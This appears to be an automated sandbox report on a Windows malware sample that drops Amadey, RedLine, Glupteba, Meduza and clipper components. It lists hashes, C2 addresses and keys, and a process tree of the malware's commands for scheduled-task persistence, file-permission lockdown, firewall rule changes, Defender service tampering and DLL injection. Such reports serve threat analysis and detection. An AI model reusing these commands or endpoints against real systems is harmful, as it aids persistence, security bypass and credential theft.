Analysis

  • max time kernel
    300s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20230831-en
  • resource tags

    arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-09-2023 01:20

General

  • Target

    t1021016.exe

  • Size

    315KB

  • MD5

    6c1068ad55abd44595fbfe797029492d

  • SHA1

    d96803e34295f89aafca4028769cde18af44c11d

  • SHA256

    6a8cb6cbb367c04b185feedb62126077d415dfe552acb5f524a497b7eabe4f58

  • SHA512

    20a9d00fe64e69d518129aa3c6ecf853d662ab1b349c67d909bc55dd944bdf9b97271af10d035f7132f0e7e7413f7c715473d5bc8264b5ade226a309f622044a

  • SSDEEP

    6144:zR/tsQnf6X0M6+koYhXMxjwigfwfgbePu97rrAOQ322222KTq:zRlHVckoaXMxcePu97Hg22222iq

Malware Config

Extracted

Family

amadey

Version

3.87

C2

193.233.255.9/nasa/index.php

Attributes
  • install_dir

    ebb444342c

  • install_file

    legosa.exe

  • strings_key

    0b59a358b8646634fe523e0d5fe7fc43

rc4.plain

Extracted

Family

redline

C2

91.103.252.3:48665

Attributes
  • auth_value

    0c16e9e64d9b037e5f1ff9082d8f439f

Extracted

Family

redline

Botnet

10K

C2

77.232.38.234:80

Attributes
  • auth_value

    e0b9a8ef2c92da39d627d67103b3b93f

Extracted

Family

amadey

Version

3.83

C2

5.42.65.80/8bmeVwqx/index.php

Attributes
  • install_dir

    207aa4515d

  • install_file

    oneetx.exe

  • strings_key

    3e634dd0840c68ae2ced83c2be7bf0d4

rc4.plain

Extracted

Family

amadey

Version

3.88

C2

79.110.62.80/8bmeVwqx/index.php

Attributes
  • install_dir

    e8bff37b77

  • install_file

    yiueea.exe

  • strings_key

    dc58c693b6742b940cbf7234174a0f66

rc4.plain

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 56 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 21 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    PID:3212
    • C:\Users\Admin\AppData\Local\Temp\t1021016.exe
      "C:\Users\Admin\AppData\Local\Temp\t1021016.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
        "C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4316
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legosa.exe /TR "C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:4660
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legosa.exe" /P "Admin:N"&&CACLS "legosa.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ebb444342c" /P "Admin:N"&&CACLS "..\ebb444342c" /P "Admin:R" /E&&Exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4908
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
              PID:4224
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "legosa.exe" /P "Admin:N"
              5⤵
                PID:4256
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "legosa.exe" /P "Admin:R" /E
                5⤵
                  PID:3184
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  5⤵
                    PID:2520
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\ebb444342c" /P "Admin:N"
                    5⤵
                      PID:4796
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "..\ebb444342c" /P "Admin:R" /E
                      5⤵
                        PID:4944
                    • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:3836
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4240
                    • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2748
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4928
                    • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4848
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4288
                    • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2420
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                        5⤵
                          PID:4528
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          5⤵
                            PID:424
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 288
                            5⤵
                            • Program crash
                            PID:4048
                        • C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe"
                          4⤵
                            PID:5092
                            • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                              "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:3848
                              • C:\Windows\SysWOW64\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
                                6⤵
                                • Creates scheduled task(s)
                                PID:3948
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
                                6⤵
                                  PID:4800
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    7⤵
                                      PID:3348
                                    • C:\Windows\SysWOW64\cacls.exe
                                      CACLS "oneetx.exe" /P "Admin:N"
                                      7⤵
                                        PID:3784
                                      • C:\Windows\SysWOW64\cacls.exe
                                        CACLS "oneetx.exe" /P "Admin:R" /E
                                        7⤵
                                          PID:1560
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          7⤵
                                            PID:536
                                          • C:\Windows\SysWOW64\cacls.exe
                                            CACLS "..\207aa4515d" /P "Admin:N"
                                            7⤵
                                              PID:2632
                                            • C:\Windows\SysWOW64\cacls.exe
                                              CACLS "..\207aa4515d" /P "Admin:R" /E
                                              7⤵
                                                PID:1480
                                            • C:\Users\Admin\AppData\Local\Temp\1000438001\ss41.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000438001\ss41.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4216
                                            • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4044
                                              • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3108
                                                • C:\Users\Admin\AppData\Local\Temp\winlog.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\winlog.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5892
                                                  • C:\Users\Admin\AppData\Local\Temp\is-TDGOF.tmp\winlog.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-TDGOF.tmp\winlog.tmp" /SL5="$60278,25895378,832512,C:\Users\Admin\AppData\Local\Temp\winlog.exe"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:5380
                                                    • C:\Users\Admin\AppData\Local\Temp\winlog.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\winlog.exe" /SILENT
                                                      10⤵
                                                      • Executes dropped EXE
                                                      PID:4064
                                                      • C:\Users\Admin\AppData\Local\Temp\is-KESNE.tmp\winlog.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-KESNE.tmp\winlog.tmp" /SL5="$70278,25895378,832512,C:\Users\Admin\AppData\Local\Temp\winlog.exe" /SILENT
                                                        11⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:5628
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Public\Document\python.exe C:\Users\Public\Document\dsc.py"
                                                          12⤵
                                                            PID:7292
                                                            • C:\Users\Public\Document\python.exe
                                                              C:\Users\Public\Document\python.exe C:\Users\Public\Document\dsc.py
                                                              13⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:7024
                                              • C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
                                                6⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:2764
                                                • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                                                  C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                                                  7⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:5144
                                              • C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
                                                6⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Drops file in Drivers directory
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2728
                                              • C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4836
                                                • C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Checks SCSI registry key(s)
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:816
                                              • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                6⤵
                                                  PID:5080
                                                  • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3184
                                                • C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
                                                  6⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:612
                                                • C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
                                                  6⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Drops file in Drivers directory
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5112
                                                • C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:3076
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nologo -noprofile
                                                    7⤵
                                                      PID:6288
                                                    • C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                                      7⤵
                                                      • Windows security bypass
                                                      • Executes dropped EXE
                                                      • Windows security modification
                                                      • Adds Run key to start application
                                                      • Checks for VirtualBox DLLs, possible anti-VM trick
                                                      • Drops file in Windows directory
                                                      • Modifies data under HKEY_USERS
                                                      PID:7524
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        8⤵
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        PID:2996
                                                      • C:\Windows\System32\cmd.exe
                                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                        8⤵
                                                          PID:6904
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                            9⤵
                                                            • Modifies Windows Firewall
                                                            • Modifies data under HKEY_USERS
                                                            PID:6308
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -nologo -noprofile
                                                          8⤵
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          PID:7988
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -nologo -noprofile
                                                          8⤵
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          PID:6588
                                                        • C:\Windows\rss\csrss.exe
                                                          C:\Windows\rss\csrss.exe
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Manipulates WinMonFS driver.
                                                          • Drops file in Windows directory
                                                          PID:7612
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            9⤵
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            PID:5544
                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                            9⤵
                                                            • Creates scheduled task(s)
                                                            PID:5604
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            9⤵
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            PID:6384
                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                            schtasks /delete /tn ScheduledUpdate /f
                                                            9⤵
                                                              PID:6156
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              9⤵
                                                              • Drops file in System32 directory
                                                              • Modifies data under HKEY_USERS
                                                              PID:4592
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                10⤵
                                                                • Executes dropped EXE
                                                                PID:724
                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:6316
                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                              9⤵
                                                              • Creates scheduled task(s)
                                                              PID:4172
                                                            • C:\Windows\windefender.exe
                                                              "C:\Windows\windefender.exe"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:7572
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                10⤵
                                                                  PID:4796
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                    11⤵
                                                                    • Launches sc.exe
                                                                    PID:8116
                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:7384
                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                  schtasks /delete /tn "csrss" /f
                                                                  10⤵
                                                                    PID:5596
                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                    schtasks /delete /tn "ScheduledUpdate" /f
                                                                    10⤵
                                                                      PID:5964
                                                            • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3408
                                                              • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                                7⤵
                                                                  PID:724
                                                                • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:1940
                                                                • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5092
                                                                • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5080
                                                              • C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
                                                                6⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:4260
                                                              • C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
                                                                6⤵
                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                • Drops file in Drivers directory
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4032
                                                          • C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:3164
                                                            • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:2988
                                                          • C:\Users\Admin\AppData\Local\Temp\1000172001\Amadey.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000172001\Amadey.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:1788
                                                            • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:928
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe" /F
                                                                6⤵
                                                                • Creates scheduled task(s)
                                                                PID:3944
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8bff37b77" /P "Admin:N"&&CACLS "..\e8bff37b77" /P "Admin:R" /E&&Exit
                                                                6⤵
                                                                  PID:4692
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    7⤵
                                                                      PID:4796
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      CACLS "yiueea.exe" /P "Admin:N"
                                                                      7⤵
                                                                        PID:4144
                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                        CACLS "yiueea.exe" /P "Admin:R" /E
                                                                        7⤵
                                                                          PID:4888
                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                          CACLS "..\e8bff37b77" /P "Admin:N"
                                                                          7⤵
                                                                            PID:3828
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                            7⤵
                                                                              PID:2580
                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                              CACLS "..\e8bff37b77" /P "Admin:R" /E
                                                                              7⤵
                                                                                PID:1464
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
                                                                              6⤵
                                                                              • Loads dropped DLL
                                                                              PID:5708
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
                                                                                7⤵
                                                                                • Loads dropped DLL
                                                                                PID:5744
                                                                                • C:\Windows\system32\WerFault.exe
                                                                                  C:\Windows\system32\WerFault.exe -u -p 5744 -s 596
                                                                                  8⤵
                                                                                  • Program crash
                                                                                  PID:5904
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
                                                                              6⤵
                                                                              • Loads dropped DLL
                                                                              PID:5792
                                                                        • C:\Users\Admin\AppData\Local\Temp\1000173001\Meduza.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1000173001\Meduza.exe"
                                                                          4⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Accesses Microsoft Outlook profiles
                                                                          • outlook_office_path
                                                                          • outlook_win_path
                                                                          PID:2808
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                          4⤵
                                                                          • Loads dropped DLL
                                                                          PID:1752
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
